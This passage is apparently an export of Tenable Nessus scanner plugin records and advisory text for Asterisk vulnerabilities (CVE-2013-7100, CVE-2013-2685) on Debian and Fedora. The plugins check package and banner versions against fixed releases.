DSA-2835-1 : asterisk - buffer overflow", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2835.NASL", "href": "https://www.tenable.com/plugins/nessus/71848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2835. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71848);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_bugtraq_id(64364);\n script_xref(name:\"DSA\", value:\"2835\");\n\n script_name(english:\"Debian DSA-2835-1 : asterisk - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jan Juergens discovered a buffer overflow in the parser for SMS\nmessages in Asterisk.\n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.html\n\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system administrator to disable the expansion\nof'dangerous' functions (such as SHELL()) from any interface which is\nnot the dialplan. In stable and oldstable this option is disabled by\ndefault. To enable it add the following line to the section\n'[options]' in /etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=732355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2835\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-config\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dahdi\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dbg\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dev\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-doc\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mobile\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-modules\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mp3\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mysql\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-ooh323\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:25:49", "description": "- Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.7.0-1 :\n\n - The Asterisk Development Team has announced the release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-01-09T00:00:00", "type": "nessus", "title": "Fedora 20 : asterisk-11.7.0-1.fc20 (2013-24108)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2013-24108.NASL", "href": "https://www.tenable.com/plugins/nessus/71868", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-24108.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71868);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_xref(name:\"FEDORA\", value:\"2013-24108\");\n\n script_name(english:\"Fedora 20 : asterisk-11.7.0-1.fc20 (2013-24108)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.7.0-1 :\n\n - The Asterisk Development Team has announced the\n release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043918\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125903.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ca40482\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"asterisk-11.7.0-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:46", "description": "- Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.7.0-1 :\n\n - The Asterisk Development Team has announced the release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-01-09T00:00:00", "type": "nessus", "title": "Fedora 19 : asterisk-11.7.0-1.fc19 (2013-24119)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2013-24119.NASL", "href": "https://www.tenable.com/plugins/nessus/71870", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-24119.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71870);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_xref(name:\"FEDORA\", value:\"2013-24119\");\n\n script_name(english:\"Fedora 19 : asterisk-11.7.0-1.fc19 (2013-24119)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.7.0-1 :\n\n - The Asterisk Development Team has announced the\n release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043918\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125891.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d832fa82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"asterisk-11.7.0-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:45:15", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a buffer overflow vulnerability related to SIP SDP headers and h264 video handling. This error could allow execution of arbitrary code.", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk SIP SDP Buffer Overflow (AST-2013-001)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_001.NASL", "href": "https://www.tenable.com/plugins/nessus/65896", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65896);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2685\");\n script_bugtraq_id(58760);\n\n script_name(english:\"Asterisk SIP SDP Buffer Overflow (AST-2013-001)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a buffer overflow\nvulnerability related to SIP SDP headers and h264 video handling. This\nerror could allow execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-20901\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 11.2.2 or apply the patch listed in the Asterisk\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2685\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 11x < 11.2.2\n if (version =~ \"^11\\.([01]|2\\.[01])([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.2.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_hole(port:port, proto:proto, extra:report);\n }\n else security_hole(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:22", "description": "The Asterisk Development Team has announced security releases for Certified Asterisk 1.8.15 and Asterisk 1.8, 10, and 11. The available security releases are released as versions 1.8.15-cert2, 1.8.20.2, 10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format negotiation. The format attribute resource for H.264 video performs an unsafe read against a media attribute when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a fix for Asterisk's HTTP server for a remotely-triggered crash. While the fix prevented the crash from being triggered, a denial of service vector still exists with that solution if an attacker sends one or more HTTP POST requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP channel driver. When authenticating a SIP request with alwaysauthreject enabled, allowguest disabled, and autocreatepeer disabled, Asterisk discloses whether a user exists for INVITE, SUBSCRIBE, and REGISTER transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security advisories.\n\nFor more information about the details of these vulnerabilities, please read security advisories AST-2013-001, AST-2013-002, and AST-2013-003, which were released at the same time as this announcement.\n\nFor a full list of changes in the current releases, please see the ChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/release s/ChangeLog-1.8.15-cert2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-1.8.20.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-10.12.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-10.12.2-digiumphones http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-11.2.2\n\nThe security advisories are available at :\n\n - http://downloads.asterisk.org/pub/security/AST-2013-001.\n pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-00 2.pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-00 3.pdf\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.2.2-1.fc18 (2013-4566)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-4566.NASL", "href": "https://www.tenable.com/plugins/nessus/65836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-4566.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65836);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-2685\");\n script_bugtraq_id(58760);\n script_xref(name:\"FEDORA\", value:\"2013-4566\");\n\n script_name(english:\"Fedora 18 : asterisk-11.2.2-1.fc18 (2013-4566)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", 